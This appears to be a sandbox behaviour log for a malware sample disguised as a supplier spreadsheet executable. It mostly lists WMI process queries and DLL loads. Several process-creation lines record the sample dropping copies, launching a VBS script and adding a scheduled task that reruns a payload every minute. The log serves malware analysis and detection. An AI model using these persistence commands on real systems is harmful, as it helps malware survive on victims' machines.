                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Supplier 0202AW-PER2 Sheet.exeVirustotal: Detection: 84%
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile read: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe "C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe"
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe"
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 7800
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbsJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
